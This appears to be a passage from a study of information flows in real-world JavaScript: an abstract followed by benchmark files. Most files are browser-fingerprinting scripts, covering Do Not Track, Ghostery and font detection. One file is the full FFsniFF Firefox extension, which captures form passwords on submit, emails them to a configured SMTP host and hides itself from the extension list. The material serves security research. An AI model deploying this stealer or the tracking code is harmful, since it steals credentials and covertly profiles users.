An Empirical Study of Information Flows in Real-World JavaScript

Information flow analysis prevents secret or untrusted data from flowing into public or trusted sinks. Existing mechanisms cover a wide array of options, ranging from lightweight taint analysis to heavyweight information flow control that also considers implicit flows. Dynamic analysis, which is particularly popular for languages such as JavaScript, faces the question whether to invest in analyzing flows caused by not executing a particular branch, so-called hidden implicit flows. This paper addresses the questions how common different kinds of flows are in real-world programs, how important these flows are to enforce security policies, and how costly it is to consider these flows. We address these questions in an empirical study that analyzes 56 real-world JavaScript programs that suffer from various security problems, such as code injection vulnerabilities, denial of service vulnerabilities, memory leaks, and privacy leaks. The study is based on a state-of-the-art dynamic information flow analysis and a formalization of its core. We find that implicit flows are expensive to track in terms of permissiveness, label creep, and runtime overhead. We find a lightweight taint analysis to be sufficient for most of the studied security problems, while for some privacy-related code, observable tracking is sometimes required. In contrast, we do not find any evidence that tracking hidden implicit flows reveals otherwise missed security problems. Our results help security analysts and analysis designers to understand the cost-benefit tradeoffs of information flow analysis and provide empirical evidence that analyzing implicit flows in a cost-effective way is a relevant problem.

==> observableflows/doNotTrack.js <==
// Check wether doNotTrack field is activated in the browser.
// Source: testSource, sink: console.log(c)

// Deobfuscated code
//$(function() {
 var navigator = {};
 var window = {};

  var testSource = {
        navigator_doNotTrack: ((Math.random() >= 0.5) ? true : false),
        window_doNotTrack: ((Math.random() >= 0.5) ? true : false),
        navigator_msDoNotTrack: ((Math.random() >= 0.5) ? true : false)
  };
  var name;
  for (name in testSource) {
    /** @type {boolean} */
    var c = false;
    if (!!testSource[name]) {
      if (!(1 != testSource[name] && "yes" != testSource[name])) {
        /** @type {boolean} */
        c = true;
      }
    }
   console.log(c);
  }
//    $("#" + name).html((c ? Tru '<span class="true">&#10004;</span>e ' : '<span class="false">&#215;</span> False') + " (<i>" + testSource[name] + "</i>)");

//});

//Original code

/* https://browserleaks.com/js/donottrack.js */



==> observableflows/extensionGhostery.js <==

// https://popmyads.com/
// Check for Ghostery extension via web accessible resources. If not installed, it loads an image
// Source: s.src, sink: node.innerHTML 

 var document = {}

 function printMsg() {
//        var node = document.getElementById("write");
	document.write = {};
	var node = document.write;
//        node.innerHTML = "<img src='https://whos.amung.us/swidget/popmydex.png'/>";
	node.innerHTML = "<img src='https://whos.amung.us/swidget/popmydex.png'/>";
        console.log(node.innerHTML);
    };


    function Ext_Detect_NotInstalled(ExtName,ExtID) {
   console.log(ExtName + ' Not Installed');
    printMsg();

  }

  function Ext_Detect_Installed(ExtName,ExtID) {
    console.log(ExtName + ' Installed');
  }

  var Ext_Detect = function(ExtName,ExtID) {
//    var s = document.createElement('script');
    document.script = {};
    var s = document.script;
    s.src = 'chrome-extension://' + ExtID + '/data/images/click2play/allow_once.png';

//    s.onload = function(){Ext_Detect_Installed(ExtName,ExtID);};
//    s.onerror = function(){Ext_Detect_NotInstalled(ExtName,ExtID);};
    if (s.src.includes('chrome') && (Math.random() >= 0.5)){
	Ext_Detect_Installed(ExtName,ExtID);
    }
    else {
	Ext_Detect_NotInstalled(ExtName,ExtID)
    }
//    document.body.appendChild(s);
    document.body = s
  }

// var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
   var is_chrome = Math.random() >= 0.5;

 if (is_chrome==true)
 {
//  window.onload = function() { Ext_Detect('Ghostery','mlomiejdfkolichcflejclcbmpeaniij');};
 Ext_Detect('Ghostery','mlomiejdfkolichcflejclcbmpeaniij');
 }

 if (is_chrome==false)
 {
printMsg();
 }



==> observableflows/ffsniffOverlay_orig.js <==
// FFsniFF (FireFox sniFFer)
// http://azurit.elbiahosting.sk/ffsniff/
// Copyright (C) 2006-2008 azurIt (azurit@pobox.sk, azurIt@IRCnet)
//
// LICENSE:
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 3 as
// published by the Free Software Foundation.
////////////////////////////////////////////////////////////////////////////////

// set this to some host (FFsniFF will send this with EHLO command)
var send_from_host = "<SEND_FROM_HOST>";
// set this to the sender e-mail address
var send_from = "<SEND_FROM>";
// set this to the receiver e-mail address
var send_to = "<SEND_TO>";
// subject of the mail
var subject = "<SUBJECT>";
// smtp server which will be used to send e-mail
var smtp_host = "<SMTP_HOST>";
// smtp port
var smtp_port = "<SMTP_PORT>";
// hidding enable/disable
var enable_hide = "<HIDDING>";


////////////////////////////////////////////////////////////////////////////////
///////////////////// DO NOT CHANGE ANYTHING BELOW THIS ////////////////////////
////////////////////////////////////////////////////////////////////////////////

var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
var transport = "";
var outstream = "";

var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
var stream = "";

// find out FF version
var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);
var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);

var data = "";
var data0 = "EHLO " + send_from_host + "\r\n"
var data1 = "MAIL FROM: <" + send_from + ">\r\n"
var data2 = "RCPT TO: <" + send_to + ">\r\n"
var data3 = "DATA\r\n"
var data4 = "\r\n.\r\n"
var data5 = "QUIT\r\n"

function send_data() {
	transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
	outstream = transport.openOutputStream(0, 0, 0);
	stream = transport.openInputStream(0, 0, 0);
	instream.init(stream);

	// this will avoid 'Improper use of SMTP command pipelining'
	// error on SMTP servers
	outstream.write(data0, data0.length);
	while (instream.available() == 0) {}
	instream.read(instream.available());

	outstream.write(data1, data1.length);
	while (instream.available() == 0) {}
	instream.read(instream.available());

	outstream.write(data2, data2.length);
	while (instream.available() == 0) {}
	instream.read(instream.available());

	outstream.write(data3, data3.length);
	while (instream.available() == 0) {}
	instream.read(instream.available());

	outstream.write(data, data.length);
	// don't read here cos no data was send to us
	//while (instream.available() == 0) {}
	//instream.read(instream.available());

	outstream.write(data4, data4.length);
	while (instream.available() == 0) {}
	instream.read(instream.available());

	outstream.write(data5, data5.length);
	while (instream.available() == 0) {}

	outstream.close();
	instream.close();
}

if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
	var workingThread = function() {
	};

	workingThread.prototype = {
		run: function() {
			send_data();
		}
	};
} else {
	var runnable = {
		run: function() {
			send_data();
		}
	}
}

function sniff() {
	// if we are running under 3.0 or later
	if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
		var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);
		thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);
	} else {
		var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
		thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
	}
}

function do_sniff() {
	var ok = 0;
	var hesla = window.content.document.getElementsByTagName("input");
	data = "";
	for (var i = 0; i < hesla.length; i++) {
		if (hesla[i].value != "") {
			if (hesla[i].type == "password") {
				ok = 1;
			}
			if (hesla[i].name == "") {
				data += hesla[i].type + ":" + "<blank>:" + hesla[i].value + "\n";
			}
			else {
				data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
			}
		}
	}
	if (ok == 1) {
		data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
		sniff()
	}
}

function hide_me() {
	var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
	var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
	var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
	var root = RDFService.GetResource("urn:mozilla:item:root");
	var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
	Container.Init(extensionDS, root);
	var elements = Container.GetElements();
	while (elements.hasMoreElements()) {
		var element = elements.getNext();
		var name = "";
		var target = extensionDS.GetTarget(element, nameArc, true);
		if (target) {
			name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
			if (name == "FFsniFF") {
				Container.RemoveElement(element, true);
			}
		}
	}
}

if (enable_hide == "yes") {
	hide_me();
}

window.addEventListener("submit", do_sniff, false);


==> observableflows/fonts.js <==
// From FPDetective: original script name: pomegranate.js
// Fingerprinting fonts: Added some randomness to emulate the presence of certain fonts
// Sources: offsetWidth and offsetHeight are high
// Sinks: console.log(), normally it is an image source, GET request or xhr

var document = {fontspan:{offsetWidth : 15, offsetHeight: 20, style : {fontFamily: ""} }}


var fonts = new Array('Abadi MT Condensed Light', 'Academy Engraved LET',
		'ADOBE CASLON PRO', 'Adobe Garamond', 'ADOBE GARAMOND PRO',
		'Agency FB', 'Aharoni', 'Albertus Extra Bold', 'Albertus Medium',
		'Algerian', 'Amazone BT', 'American Typewriter',
		'American Typewriter Condensed', 'AmerType Md BT', 'Andale Mono',
		'Andalus', 'Angsana New', 'AngsanaUPC', 'Antique Olive', 'Aparajita',
		'Apple Chancery', 'Apple Color Emoji', 'Apple SD Gothic Neo',
		'Arabic Typesetting', 'ARCHER', 'Arial', 'Arial Black', 'Arial Hebrew',
		'Arial MT', 'Arial Narrow', 'Arial Rounded MT Bold',
		'Arial Unicode MS', 'ARNO PRO', 'Arrus BT', 'Aurora Cn BT',
		'AvantGarde Bk BT', 'AvantGarde Md BT', 'AVENIR', 'Ayuthaya', 'Bandy',
		'Bangla Sangam MN', 'Bank Gothic', 'BankGothic Md BT', 'Baskerville',
		'Baskerville Old Face', 'Batang', 'BatangChe', 'Bauer Bodoni',
		'Bauhaus 93', 'Bazooka', 'Bell MT', 'Bembo', 'Benguiat Bk BT',
		'Berlin Sans FB', 'Berlin Sans FB Demi', 'Bernard MT Condensed',
		'BernhardFashion BT', 'BernhardMod BT', 'Big Caslon', 'BinnerD',
		'Bitstream Vera Sans Mono', 'Blackadder ITC', 'BlairMdITC TT',
		'Bodoni 72', 'Bodoni 72 Oldstyle', 'Bodoni 72 Smallcaps', 'Bodoni MT',
		'Bodoni MT Black', 'Bodoni MT Condensed',
		'Bodoni MT Poster Compressed', 'Book Antiqua', 'Bookman Old Style',
		'Bookshelf Symbol 7', 'Boulder', 'Bradley Hand', 'Bradley Hand ITC',
		'Bremen Bd BT', 'Britannic Bold', 'Broadway', 'Browallia New',
		'BrowalliaUPC', 'Brush Script MT', 'Calibri', 'Californian FB',
		'Calisto MT', 'Calligrapher', 'Cambria', 'Cambria Math', 'Candara',
		'CaslonOpnface BT', 'Castellar', 'Centaur', 'Century',
		'Century Gothic', 'Century Schoolbook', 'Cezanne', 'CG Omega',
		'CG Times', 'Chalkboard', 'Chalkboard SE', 'Chalkduster',
		'Charlesworth', 'Charter Bd BT', 'Charter BT', 'Chaucer',
		'ChelthmITC Bk BT', 'Chiller', 'Clarendon', 'Clarendon Condensed',
		'CloisterBlack BT', 'Cochin', 'Colonna MT', 'Comic Sans',
		'Comic Sans MS', 'Consolas', 'Constantia', 'Cooper Black',
		'Copperplate', 'Copperplate Gothic', 'Copperplate Gothic Bold',
		'Copperplate Gothic Light', 'CopperplGoth Bd BT', 'Corbel',
		'Cordia New', 'CordiaUPC', 'Cornerstone', 'Coronet', 'Courier',
		'Courier New', 'Cuckoo', 'Curlz MT', 'DaunPenh', 'Dauphin', 'David',
		'DB LCD Temp', 'DELICIOUS', 'Denmark', 'Devanagari Sangam MN',
		'DFKai-SB', 'Didot', 'DilleniaUPC', 'DIN', 'DokChampa', 'Dotum',
		'DotumChe', 'Ebrima', 'Edwardian Script ITC', 'Elephant',
		'English 111 Vivace BT', 'Engravers MT', 'EngraversGothic BT',
		'Eras Bold ITC', 'Eras Demi ITC', 'Eras Light ITC', 'Eras Medium ITC',
		'Estrangelo Edessa', 'EucrosiaUPC', 'Euphemia', 'Euphemia UCAS',
		'EUROSTILE', 'Exotc350 Bd BT', 'FangSong', 'Felix Titling', 'Fixedsys',
		'FONTIN', 'Footlight MT Light', 'Forte', 'Franklin Gothic',
		'Franklin Gothic Book', 'Franklin Gothic Demi',
		'Franklin Gothic Demi Cond', 'Franklin Gothic Heavy',
		'Franklin Gothic Medium', 'Franklin Gothic Medium Cond', 'FrankRuehl',
		'Fransiscan', 'Freefrm721 Blk BT', 'FreesiaUPC', 'Freestyle Script',
		'French Script MT', 'FrnkGothITC Bk BT', 'Fruitger', 'FRUTIGER',
		'Futura', 'Futura Bk BT', 'Futura Lt BT', 'Futura Md BT',
		'Futura ZBlk BT', 'FuturaBlack BT', 'Gabriola', 'Galliard BT',
		'Garamond', 'Gautami', 'Geeza Pro', 'Geneva', 'Geometr231 BT',
		'Geometr231 Hv BT', 'Geometr231 Lt BT', 'Georgia', 'GeoSlab 703 Lt BT',
		'GeoSlab 703 XBd BT', 'Gigi', 'Gill Sans', 'Gill Sans MT',
		'Gill Sans MT Condensed', 'Gill Sans MT Ext Condensed Bold',
		'Gill Sans Ultra Bold', 'Gill Sans Ultra Bold Condensed', 'Gisha',
		'Gloucester MT Extra Condensed', 'GOTHAM', 'GOTHAM BOLD',
		'Goudy Old Style', 'Goudy Stout', 'GoudyHandtooled BT', 'GoudyOLSt BT',
		'Gujarati Sangam MN', 'Gulim', 'GulimChe', 'Gungsuh', 'GungsuhChe',
		'Gurmukhi MN', 'Haettenschweiler', 'Harlow Solid Italic', 'Harrington',
		'Heather', 'Heiti SC', 'Heiti TC', 'HELV', 'Helvetica',
		'Helvetica Neue', 'Herald', 'High Tower Text',
		'Hiragino Kaku Gothic ProN', 'Hiragino Mincho ProN', 'Hoefler Text',
		'Humanst 521 Cn BT', 'Humanst521 BT', 'Humanst521 Lt BT', 'Impact',
		'Imprint MT Shadow', 'Incised901 Bd BT', 'Incised901 BT',
		'Incised901 Lt BT', 'INCONSOLATA', 'Informal Roman', 'Informal011 BT',
		'INTERSTATE', 'IrisUPC', 'Iskoola Pota', 'JasmineUPC', 'Jazz LET',
		'Jenson', 'Jester', 'Jokerman', 'Juice ITC', 'Kabel Bk BT',
		'Kabel Ult BT', 'Kailasa', 'KaiTi', 'Kalinga', 'Kannada Sangam MN',
		'Kartika', 'Kaufmann Bd BT', 'Kaufmann BT', 'Khmer UI', 'KodchiangUPC',
		'Kokila', 'Korinna BT', 'Kristen ITC', 'Krungthep', 'Kunstler Script',
		'Lao UI', 'Latha', 'Leelawadee', 'Letter Gothic', 'Levenim MT',
		'LilyUPC', 'Lithograph', 'Lithograph Light', 'Long Island',
		'Lucida Bright', 'Lucida Calligraphy', 'Lucida Console', 'Lucida Fax',
		'LUCIDA GRANDE', 'Lucida Handwriting', 'Lucida Sans',
		'Lucida Sans Typewriter', 'Lucida Sans Unicode', 'Lydian BT',
		'Magneto', 'Maiandra GD', 'Malayalam Sangam MN', 'Malgun Gothic',
		'Mangal', 'Marigold', 'Marion', 'Marker Felt', 'Market', 'Marlett',
		'Matisse ITC', 'Matura MT Script Capitals', 'Meiryo', 'Meiryo UI',
		'Microsoft Himalaya', 'Microsoft JhengHei', 'Microsoft New Tai Lue',
		'Microsoft PhagsPa', 'Microsoft Sans Serif', 'Microsoft Tai Le',
		'Microsoft Uighur', 'Microsoft YaHei', 'Microsoft Yi Baiti', 'MingLiU',
		'MingLiU_HKSCS', 'MingLiU_HKSCS-ExtB', 'MingLiU-ExtB', 'Minion',
		'Minion Pro', 'Miriam', 'Miriam Fixed', 'Mistral', 'Modern',
		'Modern No. 20', 'Mona Lisa Solid ITC TT', 'Monaco', 'Mongolian Baiti',
		'MONO', 'Monotype Corsiva', 'MoolBoran', 'Mrs Eaves', 'MS Gothic',
		'MS LineDraw', 'MS Mincho', 'MS Outlook', 'MS PGothic', 'MS PMincho',
		'MS Reference Sans Serif', 'MS Reference Specialty', 'MS Sans Serif',
		'MS Serif', 'MS UI Gothic', 'MT Extra', 'MUSEO', 'MV Boli', 'MYRIAD',
		'MYRIAD PRO', 'Nadeem', 'Narkisim', 'NEVIS', 'News Gothic',
		'News GothicMT', 'NewsGoth BT', 'Niagara Engraved', 'Niagara Solid',
		'Noteworthy', 'NSimSun', 'Nyala', 'OCR A Extended', 'Old Century',
		'Old English Text MT', 'Onyx', 'Onyx BT', 'OPTIMA', 'Oriya Sangam MN',
		'OSAKA', 'OzHandicraft BT', 'Palace Script MT', 'Palatino',
		'Palatino Linotype', 'Papyrus', 'Parchment', 'Party LET', 'Pegasus',
		'Perpetua', 'Perpetua Titling MT', 'PetitaBold', 'Pickwick',
		'Plantagenet Cherokee', 'Playbill', 'PMingLiU', 'PMingLiU-ExtB',
		'Poor Richard', 'Poster', 'PosterBodoni BT', 'PRINCETOWN LET',
		'Pristina', 'PTBarnum BT', 'Pythagoras', 'Raavi', 'Rage Italic',
		'Ravie', 'Ribbon131 Bd BT', 'Rockwell', 'Rockwell Condensed',
		'Rockwell Extra Bold', 'Rod', 'Roman', 'Sakkal Majalla',
		'Santa Fe LET', 'Savoye LET', 'Sceptre', 'Script', 'Script MT Bold',
		'SCRIPTINA', 'Segoe Print', 'Segoe Script', 'Segoe UI',
		'Segoe UI Light', 'Segoe UI Semibold', 'Segoe UI Symbol', 'Serifa',
		'Serifa BT', 'Serifa Th BT', 'ShelleyVolante BT', 'Sherwood',
		'Shonar Bangla', 'Showcard Gothic', 'Shruti', 'Signboard',
		'SILKSCREEN', 'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed',
		'SimSun', 'SimSun-ExtB', 'Sinhala Sangam MN', 'Sketch Rockwell',
		'Skia', 'Small Fonts', 'Snap ITC', 'Snell Roundhand', 'Socket',
		'Souvenir Lt BT', 'Staccato222 BT', 'Steamer', 'Stencil', 'Storybook',
		'Styllo', 'Subway', 'Swis721 BlkEx BT', 'Swiss911 XCm BT', 'Sylfaen',
		'Symbol', 'Synchro LET', 'System', 'Tahoma', 'Tamil Sangam MN',
		'Technical', 'Teletype', 'Telugu Sangam MN', 'Tempus Sans ITC',
		'Terminal', 'Thonburi', 'Times', 'Times New Roman',
		'Times New Roman PS', 'Traditional Arabic', 'Trajan', 'TRAJAN PRO',
		'Trebuchet MS', 'Tristan', 'Tubular', 'Tunga', 'Tw Cen MT',
		'Tw Cen MT Condensed', 'Tw Cen MT Condensed Extra Bold',
		'TypoUpright BT', 'Unicorn', 'Univers', 'Univers CE 55 Medium',
		'Univers Condensed', 'Utsaah', 'Vagabond', 'Vani', 'Verdana', 'Vijaya',
		'Viner Hand ITC', 'VisualUI', 'Vivaldi', 'Vladimir Script', 'Vrinda',
		'Webdings', 'Westminster', 'WHITNEY', 'Wide Latin', 'Wingdings',
		'Wingdings 2', 'Wingdings 3', 'ZapfEllipt BT', 'ZapfHumnst BT',
		'ZapfHumnst Dm BT', 'Zapfino', 'Zurich BlkEx BT', 'Zurich Ex BT',
		'ZWAdobeF');

// the if statement below enables an observable implicit flow since variable dim is high.

function get_fonts() {
//	var fontSpan = document.getElementById("fontSpan");
	var fontSpan = document.fontspan; 
	var installed_fonts = "";
	var dim = fontSpan.offsetWidth + fontSpan.offsetHeight;
	for (var i = 0; i < fonts.length; i++) {
	
		fontSpan.style.fontFamily = fonts[i];
//		console.log(fontSpan.offsetWidth + fontSpan.offsetHeight);
//		console.log(dim);
        	var random = (Math.floor((Math.random() * 10) +1) % 2);
		var dim_old = dim;
		dim += random;
		if (dim !== fontSpan.offsetWidth + fontSpan.offsetHeight) {
			if (installed_fonts.length > 0)
				installed_fonts += ", ";
			installed_fonts += fonts[i];	
		}
		dim = dim_old;
	}
//	console.log(installed_fonts)
	return installed_fonts;
}


console.log(get_fonts());



==> observableflows/fonts2.js <==
// https://www.privacytool.org/AnonymityChecker/
// Fingerprinting fonts: Added some randomness to emulate the presence of certain fonts
// Sources: offsetWidth and offsetHeight are high
// Sinks: console.log(), normally it is an image source, GET request or xhr

var document = {body : { element1 : {}, element2: "el2"} }




/**
 * JavaScript code to detect available availability of a
 * particular font in a browser using JavaScript and CSS.
 *
 * Author : Lalit Patel
 * Website: http://www.lalit.org/lab/javascript-css-font-detect/
 * License: Apache Software License 2.0
 *          http://www.apache.org/licenses/LICENSE-2.0
 * Version: 0.15 (21 Sep 2009)
 *          Changed comparision font to default from sans-default-default,
 *          as in FF3.0 font of child element didn't fallback
 *          to parent element if the font is missing.
 * Version: 0.2 (04 Mar 2012)
 *          Comparing font against all the 3 generic font families ie,
 *          'monospace', 'sans-serif' and 'sans'. If it doesn't match all 3
 *          then that font is 100% not available in the system
 * Version: 0.3 (24 Mar 2012)
 *          Replaced sans with serif in the list of baseFonts
 */

/**
 * Usage: d = new Detector();
 *        d.detect('font name');
 */
var Detector = function() {
    // a font will be compared against all the three default fonts.
    // and if it doesn't match all 3 then that font is not available.
    var baseFonts = ['monospace', 'sans-serif', 'serif'];

    //we use m or w because these two characters take up the maximum width.
    // And we use a LLi so that the same matching fonts can get separated
    var testString = "mmmmmmmmmmlli";

    //we test using 72px font size, we may use any size. I guess larger the better.
    var testSize = '72px';

  //  var h = document.getElementsByTagName("body")[0];
      var h = document.body.element1; 
    // create a SPAN in the document to get the width of the text we use to test
   // var s = document.createElement("span");
      document.span = {offsetWidth : 15, offsetHeight: 20, style : {fontSize: ""} };
      var s = document.span;
      s.style.fontSize = testSize;
      s.innerHTML = testString;
      var defaultWidth = {};
      var defaultHeight = {};
     for (var index in baseFonts) {
        //get the default width for the three base fonts
        s.style.fontFamily = baseFonts[index];
//        h.appendChild(s);
        h.element3 = s;
        defaultWidth[baseFonts[index]] = s.offsetWidth; //width for the default font
        defaultHeight[baseFonts[index]] = s.offsetHeight; //height for the defualt font
//        h.removeChild(s);
	delete h.element3;

    }

    function detect(font) {
        var detected = false;
        for (var index in baseFonts) {
            s.style.fontFamily = font + ',' + baseFonts[index]; // name of the font along with the base font for fallback.
 //           h.appendChild(s);
        h.element4 = s;
        console.log(defaultWidth[baseFonts[index]]);
           var random1 = (Math.floor((Math.random() * 10) +1) % 2);
           var random2 = (Math.floor((Math.random() * 10) +1) % 2);
           var matched = ((s.offsetWidth + random1) != defaultWidth[baseFonts[index]]) || ((s.offsetHeight + random2) != defaultHeight[baseFonts[index]]);
//            h.removeChild(s);
	 delete h.element4;
            detected = detected || matched;
        }
        return detected;
    }

    this.detect = detect;
};


function getJsFontList() {
    var a = new Detector
      , a = (a.detect("cursive") ? "cursive," : "") + (a.detect("monospace") ? "monospace," : "") + (a.detect("serif") ? "serif," : "") + (a.detect("sans-serif") ? "sans-serif," : "") + (a.detect("fantasy") ? "fantasy," : "") + (a.detect("default") ? "default," : "") + (a.detect("Abadi MT Condensed Light") ? "Abadi MT Condensed Light," : "") + (a.detect("Adobe Caslon Pro") ? "Adobe Caslon Pro," : "") + (a.detect("American Typewriter") ? "American Typewriter," : "") + (a.detect("Andale Mono") ? "Andale Mono," : "") + (a.detect("Andalus") ? "Andalus," : "") + (a.detect("Angsana") ? "Angsana," : "") + (a.detect("Arial") ? "Arial," : "") + (a.detect("Arial Black") ? "Arial Black," : "") + (a.detect("Arial Narrow") ? "Arial Narrow," : "") + (a.detect("Arial Rounded MT Bold") ? "Arial Rounded MT Bold," : "") + (a.detect("Avant Garde") ? "Avant Garde," : "") + (a.detect("Baskerville") ? "Baskerville," : "") + (a.detect("Bickham Script Pro") ? "Bickham Script Pro," : "") + (a.detect("Bodoni") ? "Bodoni," : "") + (a.detect("Book Antiqua") ? "Book Antiqua," : "") + (a.detect("Bookman") ? "Bookman," : "") + (a.detect("Bookman Old Style") ? "Bookman Old Style," : "") + (a.detect("Bradley Hand ITC") ? "Bradley Hand ITC," : "") + (a.detect("Calibri") ? "Calibri," : "") + (a.detect("Cambria") ? "Cambria," : "") + (a.detect("Century") ? "Century," : "") + (a.detect("Century Gothic") ? "Century Gothic," : "") + (a.detect("Century Schoolbook") ? "Century Schoolbook," : "") + (a.detect("Charcoal") ? "Charcoal," : "") + (a.detect("Comic Sans MS") ? "Comic Sans MS," : "") + (a.detect("Copperplate") ? "Copperplate," : "") + (a.detect("Courier") ? "Courier," : "") + (a.detect("Courier New") ? "Courier New," : "") + (a.detect("Damascus") ? "Damascus," : "") + (a.detect("Didot") ? "Didot," : "") + (a.detect("Futura") ? "Futura," : "") + (a.detect("Franklin Gothic") ? "Franklin Gothic," : "") + (a.detect("Franklin Gothic Medium") ? "Franklin Gothic Medium," : "") + (a.detect("Gadget") ? "Gadget," : "") + (a.detect("Garamond") ? "Garamond," : "") + (a.detect("Georgia") ? "Georgia," : "") + (a.detect("Geneva") ? "Geneva," : "") + (a.detect("Gentium") ? "Gentium," : "") + (a.detect("GillSans") ? "GillSans," : "") + (a.detect("Gill Sans") ? "Gill Sans," : "") + (a.detect("Gothic") ? "Gothic," : "") + (a.detect("Haettenschweiler") ? "Haettenschweiler," : "") + (a.detect("Helvetica") ? "Helvetica," : "") + (a.detect("Impact") ? "Impact," : "") + (a.detect("King") ? "King," : "") + (a.detect("Lucida") ? "Lucida," : "") + (a.detect("Lucida Console") ? "Lucida Console," : "") + (a.detect("Lucida Grande") ? "Lucida Grande," : "") + (a.detect("Lucida Sans") ? "Lucida Sans," : "") + (a.detect("Lalit") ? "Lalit," : "") + (a.detect("Marlett") ? "Marlett," : "") + (a.detect("Minion") ? "Minion," : "") + (a.detect("Modena") ? "Modena," : "") + (a.detect("Monaco") ? "Monaco," : "") + (a.detect("Monotype Corsiva") ? "Monotype Corsiva," : "") + (a.detect("Myriad") ? "Myriad," : "") + (a.detect("New York") ? "New York," : "") + (a.detect("Optima") ? "Optima," : "") + (a.detect("Palatino") ? "Palatino," : "") + (a.detect("Palatino Linotype") ? "Palatino Linotype," : "") + (a.detect("Papyrus") ? "Papyrus," : "") + (a.detect("Rockwell") ? "Rockwell," : "") + (a.detect("Tahoma") ? "Tahoma," : "") + (a.detect("TeX") ? "TeX," : "") + (a.detect("Times") ? "Times," : "") + (a.detect("Times New Roman") ? "Times New Roman," : "") + (a.detect("Trebuchet MS") ? "Trebuchet MS," : "") + (a.detect("Verdana") ? "Verdana," : "") + (a.detect("Verona") ? "Verona," : "") + (a.detect("Webdings") ? "Webdings," : "") + (a.detect("Wingdings") ? "Wingdings," : "") + (a.detect("Zapf Dingbats") ? "Zapf Dingbats," : "") + (a.detect("Zapfino") ? "Zapfino," : "");
    return a.substring(0, a.length - 1)
}

//function submitJsFonts(a, b) {
    var c = getJsFontList();
    console.log(c);
//    $.ajax({
//        type: "POST",
//        url: b,
//        data: "code=" + a + "&fontlist=" + c
//    })
//}



==> observableflows/fonts3.js <==
// fingerprint2.js
// Fingerprinting fonts: Added some randomness to emulate the presence of certain fonts
// Sources: offsetWidth and offsetHeight in document.span are high
// Sinks: console.log(), normally it is an image source, GET request or xhr
// Note enough randomness but it shouldn''t matter

  // kudos to http://www.lalit.org/lab/javascript-css-font-detect/
//    jsFontsKey: function (keys, done) {
//      var that = this
      // doing js fonts detection in a pseudo-async fashion
//      return setTimeout(function () {
        // a font will be compared against all the three default fonts.
        // and if it doesn't match all 3 then that font is not available.

        var document = {body : { element1 : {}, element2: "el2"} }

        var that = {options : {extendedJsFonts : true, userDefinedFonts : {}}}

        var baseFonts = ['monospace', 'sans-serif', 'serif']

        var fontList = [
          'Andale Mono', 'Arial', 'Arial Black', 'Arial Hebrew', 'Arial MT', 'Arial Narrow', 'Arial Rounded MT Bold', 'Arial Unicode MS',
          'Bitstream Vera Sans Mono', 'Book Antiqua', 'Bookman Old Style',
          'Calibri', 'Cambria', 'Cambria Math', 'Century', 'Century Gothic', 'Century Schoolbook', 'Comic Sans', 'Comic Sans MS', 'Consolas', 'Courier', 'Courier New',
          'Garamond', 'Geneva', 'Georgia',
          'Helvetica', 'Helvetica Neue',
          'Impact',
          'Lucida Bright', 'Lucida Calligraphy', 'Lucida Console', 'Lucida Fax', 'LUCIDA GRANDE', 'Lucida Handwriting', 'Lucida Sans', 'Lucida Sans Typewriter', 'Lucida Sans Unicode',
          'Microsoft Sans Serif', 'Monaco', 'Monotype Corsiva', 'MS Gothic', 'MS Outlook', 'MS PGothic', 'MS Reference Sans Serif', 'MS Sans Serif', 'MS Serif', 'MYRIAD', 'MYRIAD PRO',
          'Palatino', 'Palatino Linotype',
          'Segoe Print', 'Segoe Script', 'Segoe UI', 'Segoe UI Light', 'Segoe UI Semibold', 'Segoe UI Symbol',
          'Tahoma', 'Times', 'Times New Roman', 'Times New Roman PS', 'Trebuchet MS',
          'Verdana', 'Wingdings', 'Wingdings 2', 'Wingdings 3'
        ]
        var extendedFontList = [
          'Abadi MT Condensed Light', 'Academy Engraved LET', 'ADOBE CASLON PRO', 'Adobe Garamond', 'ADOBE GARAMOND PRO', 'Agency FB', 'Aharoni', 'Albertus Extra Bold', 'Albertus Medium', 'Algerian', 'Amazone BT', 'American Typewriter',
          'American Typewriter Condensed', 'AmerType Md BT', 'Andalus', 'Angsana New', 'AngsanaUPC', 'Antique Olive', 'Aparajita', 'Apple Chancery', 'Apple Color Emoji', 'Apple SD Gothic Neo', 'Arabic Typesetting', 'ARCHER',
          'ARNO PRO', 'Arrus BT', 'Aurora Cn BT', 'AvantGarde Bk BT', 'AvantGarde Md BT', 'AVENIR', 'Ayuthaya', 'Bandy', 'Bangla Sangam MN', 'Bank Gothic', 'BankGothic Md BT', 'Baskerville',
          'Baskerville Old Face', 'Batang', 'BatangChe', 'Bauer Bodoni', 'Bauhaus 93', 'Bazooka', 'Bell MT', 'Bembo', 'Benguiat Bk BT', 'Berlin Sans FB', 'Berlin Sans FB Demi', 'Bernard MT Condensed', 'BernhardFashion BT', 'BernhardMod BT', 'Big Caslon', 'BinnerD',
